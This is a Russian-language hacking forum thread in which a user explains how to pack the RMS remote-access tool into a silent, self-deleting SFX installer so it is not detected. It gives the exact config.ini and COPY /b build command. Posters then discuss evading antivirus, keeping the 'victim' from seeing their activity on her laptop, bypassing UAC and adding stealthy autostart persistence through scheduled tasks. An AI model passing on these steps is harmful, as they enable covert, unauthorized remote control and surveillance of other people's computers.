RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    ок тогда. Значит нам понадобится архиватор 7z.
    1) Заходим на http://7zsfx.info/ru/download.html#stable
    2) Качаем 7zSD extra (я качал релизную версию).
    3) Идем по ссылке http://7zsfx.info/ru/firststeps.html
    4) Выделяем в папке ваш файл RMS.exe (как сделать показано тут, делаем до того шага где предлагается засунуть в install.exe батник и ехе-шник) щелкаем ПКМ наводим на пункт меню 7z и там выбираем добавить к архиву. Далее следуем указаниям из ссылки в 3ем шаге. До того места, где требуется написать конфиг. Т.е. пока просто создали RMS.7z
    5) Далее открываем блокнот и пишем там такое:
    Код:
    ;!@Install@!UTF-8!
    ;Текст_в_кодировке_UTF-8
    GUIFlags="2+512"
    GUIMode="2"
    Progress="no"
    RunProgram="RMS.exe"
    SelfDelete="1"
    ;!@InstallEnd@!

Сохраняем как config.ini
    6) Собираем в одну папку файлы RMS.7z, config.ini и 7zsd_LZMA_x64.sfx (этот файл мы берем из папки, скачанной в шаге 2). Для тех у кого 32-битная система берем файл 7zsd_LZMA.sfx
    7) Теперь, когда в одной папке собраны все три файла ("RMS.7z", "config.ini" и "7zsd_LZMA.sfx"), выполните из командной строки следующую команду (порядок следования файлов в команде ОБЯЗАТЕЛЕН):
    COPY /b 7zsd_LZMA.sfx + config.ini + RMS.7z RMS2.exe
    Через мгновение в папке появится SFX архив - файл "RMS2.exe". Его запуск произведет распаковку архива во временную папку, запуск команды из конфигурационного файла, а по окончании установки удаление временной папки. И да, после этого он тоже сам удалится.
    Примечание: Если Вы не знакомы с работой в консоли, то следует учесть следующее:
    Команду нужно выполнять из папки с указанными файлами.
    Для этого нажмите [Win+R], введите cmd /k и нажмите [Enter].
    Затем в открывшемся окне консоли введите cd путь_к_папке_с_файлами (например, cd C:\7z_test) и нажмите [Enter].
    И только теперь введите указанную выше командную строку.
    Если в пути и/или имени файла имеются пробелы, то такие имена и/или пути_имена должны быть заключены в кавычки.
    Все, архив создан. Запускаете его, он устанавливает RMS и удаляется. Не палится.
    Да и еще. Вот ссылка на инфу про этот модуль, за счет которого и возможно самоудаление.

Добавлено через 1 час 50 минут
    так у меня вопрос возник. а как обойти uac?

Последнее редактирование: 10 фев 2012
    10 фев 2012
  2. Afftarius
    Afftarius Новичок
    Симпатии:
    0
    Извините, что не особо в тему, но у кого-нибудь есть свободная виртуалка? Проверить работу патча, а в VirtualBox вебка не пробрасывается (или, как альтернатива, напишите как пробросить).

10 фев 2012
  3. wald78
    wald78 Новичок
    Симпатии:
    1
    присоединяюсь к вопросу :af:

10 фев 2012
  4. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    кстати у всех работает, что я написал?

10 фев 2012
  5. Reymon
    Reymon Новичок
    Симпатии:
    0
    - Толку скажы мне, всё равно паливо, как и было, только ище больше всё запутанно.

10 фев 2012
  6. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    палево? антивирь ругается? ему же теперь не на что (если ты, конечно делал со старой версией, как в начале темы).

Добавлено через 10 минут
    да кстати народ. тут такая смешная проблема, но не забудьте, что есть 32ух и 64ех битные системы. Так что лучше юзать 7zsd_LZMA.sfx, т.к. универсальнее.

10 фев 2012
  7. Reymon
    Reymon Новичок
    Симпатии:
    0
    - как ето неначтно, ты думаешь в архиве спрятал трой от антивирусов? собирал с RMS.5 beta 3

10 фев 2012
  8. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    блджад у меня антивирь ругался на батник, а stop.js вообще не работал. Я их устранил, заменив этим. И вообще RMS -не трой. Я собирал с RMS 5.1 beta1(антивирь на эту версию молчит) и норм все(правда пока не тестил на других компах).

10 фев 2012
  9. Reymon
    Reymon Новичок
    Симпатии:
    0
    - nod32 ругается на файлы rutserv.exe / rfusclient.exe, доктор пидaр веб ругается на HookDrv.dll

10 фев 2012
  10. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    это в бете 3? ну так поставь первую. у меня вообще все ок!

11 фев 2012
  11. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    народ слушайте у меня вот такая проблема. моя жертва видит что я делаю у нее на компе. как убрать?

11 фев 2012
  12. andersen62
    andersen62 Новичок
    Симпатии:
    7
    заплати киллеру

12 фев 2012
  13. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    ок, а если серьезно, как сделать чтобы было не видно было что я делаю?

12 фев 2012
  14. TDI
    TDI Новичок
    Симпатии:
    32
    как видит?
    подключение видит, или что-то другое?

12 фев 2012
  15. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    все что я делаю у нее на компе видит. И даже сопротивляется.

12 фев 2012
  16. aigera
    aigera Новичок
    Симпатии:
    3
    есть верху замочек нажимай и не видеть она. Но при этом она может нажать ресет и вобще зачем себя палить? Жди пока нет октивности или через CMD делай свой дела

12 фев 2012
  17. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    цель - ноут. активность либо есть либо комп выключен. а вообще спасибо за замочек!

Добавлено через 48 минут
    эмм посмотрел что делает замочек. он же тупо блокирует клаву и мышь! это же ппц как палевно!

Последнее редактирование: 12 фев 2012
    12 фев 2012
  18. IceBolt
    IceBolt Новичок
    Симпатии:
    1
    Ну вы прикалываетесь.что ли?Видеть никак нельзя работу с файловым менеджером,конечно если с рабочего стола не елозите по папкам )))))
    Этож додуматься......

12 фев 2012
  19. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    народ слушайте а как пихнуть рмс в автозагрузку? чтобы беспалевно было. я вот имею пару идей, но может, уже кто-то сделал?
    моя идея в том, чтобы рмс кидать вместе с батником, который ставит задачу на включение рмса с полными правами (при этом уак отключается). затем выполняет эту задачу. после этого в папку с установленным рмсом он кидает еще 1ин батник, который уже ставит на задачу при каждом включение компа выполнение rutserv.exe опять же с полными правами (тоже отключает уак).
    Но есть 2е сложности:
    1) я точно не знаю что надо прописывать в батнике чтобы создать задачу с полными правами. у меня это пока только через графический интерфейс получалось (что меня привлекло, так это то, что когда я создал задачу и дал полные права рмсу уак не вылез, а потом, когда я уже выполнил задачу при включении компа уак тоже не вылез).
    2) чтобы делать через команды в батнике приходится указывать пароль (как я понял). правда когда я делал через графический интерфейс никакого пароля не нужно было вводить.

короче говоря, если знаете как запихнуть рмс в загрузку без палева - напишите плз, а если не знаете, то помогите с моей идеей.
    з.ы. вот ссылочка на статью про убирание уака для приложения с помощью задач

Последнее редактирование: 15 фев 2012
    14 фев 2012
  20. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    так ну значит я теперь знаю, как сделать все выше описанное. главное, чтобы жертва была админом на своем компе. тогда уак не сработает. завтра посмотрю как работает. если все норм, тогда выложу сюда как сделать (там все ппц как просто).

15 фев 2012
Статус темы:
Закрыта.
Загрузка...